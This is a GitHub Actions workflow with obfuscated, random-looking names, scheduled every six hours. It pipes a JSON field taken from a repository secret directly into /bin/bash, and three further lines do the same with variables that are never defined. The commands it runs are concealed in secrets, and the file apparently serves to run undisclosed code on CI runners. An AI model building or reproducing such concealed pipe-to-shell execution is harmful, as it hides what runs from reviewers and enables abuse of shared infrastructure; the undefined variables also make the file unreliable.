name: taodingren6735
on:
  workflow_dispatch:
  schedule:
    - cron: '40 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taodingren6735
        env:
          wcr1620: ${{ secrets.wcr1620 }}
        run: |
          echo $wcr1620 | jq -r .smgok4459 | /bin/bash
          echo $g424 | jq -r .mf32007 | /bin/bash
          echo $upt7 | jq -r .upzwt0229 | /bin/bash
          echo $mcv4127 | jq -r .oedqn724 | /bin/bash

